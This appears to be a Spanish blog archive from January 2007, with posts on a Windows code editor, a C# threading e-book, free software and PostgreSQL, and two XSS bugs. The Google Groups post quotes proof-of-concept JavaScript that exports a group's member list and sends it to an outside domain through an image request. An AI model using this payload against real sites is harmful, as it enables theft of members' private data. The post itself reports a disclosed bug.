Month: enero 2007

Categories
Utilidades

Intype, el TextMate para Windows

Desde que supe de la existencia de Intype, he venido siguiendo -por las cosas que prometía- el desarrollo de este editor.

Intype is powerful and intuitive code editor for Windows with lightning fast response.

It is easily extensible and customizable, thanks to support for scripting and native plug-ins. It makes development in any programming or scripting language quick and easy.

Hoy acabo de ver que ya se liberó la primera versión -alpha- de este pequeño pero bastante útil editor -pueden ver screencasts que muestran las cosas que trae.

Hasta el momento, por las cosas que estuve probando me ha gustado mucho este editor.

Intype Editor

Descargas

Categories
.NET Recursos

E-book gratuito sobre threading en C#

Si les interesa la programación multihebra, seguramente el siguiente libro, disponible en versión HTML y PDF, les será de utilidad.

Categories
PostgreSQL Software Libre

Sobre Software Libre

Mientras hacía una limpieza de mi buzón de correo, encontré un mensaje -con casi un año de antigüedad- que vale la pena mostrarlo:

>lo que
> quiero es demostrar la potencia de PostgreSQL en la empresa donde
> trabajo y creo que usar PostgreSQL para solucionar este gran problema
> hará que la visión de mis jefes acerca del software libre cambie
> radicalmente.

Toda vez que escoges usar software libre en lugar de software privativo
estas haciendo un compromiso. Por un lado tienes la posibilidad de usar
el software sin pagar, mirar el codigo, modificarlo de ser necesario,
etc. Pero tambien adquieres varios costos. Por ej. no dispones de un
telefono gratis al cual puedas llamar para solucionar tus problemas; las
cosas pueden ser mas arcanas para instalar o configurar; las respuestas
a preguntas de soporte no vendran en un manual, y pueden resultarte
desagradablemente planteadas. (No es adorable cuando una bonita
vendedora te dice con sus labios delicados o carnosos, segun tu
preferencia: "ah, pero por supuesto que Ud. puede hacer esto; solo tiene
que desembolsar otros us$2000 para obtener la nueva version de nuestro
producto". Que desagradable cuando en cambio un bruto en una lista de
correo te indica que si perdiste datos es porque "eres un idiota,
debiste hacer upgrade hace meses")

Cuando alguien me habla de "cambiar la vision de alguien radicalmente" a
mi me da una especie de temor de que el proyecto fracase por chocar con
el escepticismo natural de la gente, sobre todo los jefes; sobre todo
los jefes convencidos de que en el patio de al lado el pasto es mas
verde. Tengo la impresion de que dentro de un mes vas a estar pidiendo
ayuda "urgente" porque "este proyecto se ha arrastrado demasiado tiempo
y no ha dado frutos", porque "me van a echar del trabajo", porque "van a
comprar MS SQL Server", etc etc. Hemos visto eso aqui.

En resumen, ten cuidado con lo que propones hacer con una herramienta
que no conoces. Puede que sea cierto que PostgreSQL "no se la puede" en
el escenario que quieres manejar. Y si toda la opinion de tus jefes
depende de eso, puede resultar que la presion te resulte poco grata.

Categories
Google JavaScript Seguridad XSS

Otro bug, de la mano de Google

Este año recién empieza y ya se han reportado múltiples fallos de seguridad en diversas aplicaciones, esta vez Michael Schwarz comenta sobre un bug en Google Groups, que permite insertar javascript en el mensaje que se envía al administrador del grupo al momento de suscribirse.

Google groups

En el mismo artículo, pone código de prueba que permite obtener la lista de miembros de un grupo X.

javascript:

<script type="text/javascript">
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", "/group/[GROUPNAME]/manage_members/MemberList.csv?Action.Export=Export+member+list", true);
xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4) {
        var img = document.createElement("img");
        img.src = "http://yourdomain/?" + escape(xmlhttp.responseText);
        document.body.appendChild(img);
    }
};
xmlhttp.send(null);
</script>
Categories
Seguridad XSS

XSS a través del plugin para PDF de Adobe

Hace algunas horas, Stefan Esser comentaba un bug, descubierto por Stefano Di Paola, en el plugin para PDF de Adobe, que permite realizar ataques XSS a cualquier sitio que contenga documentos PDF.

Ejm: http://www.google.com/

Sugieren deshabilitar este plugin para evitar problemas.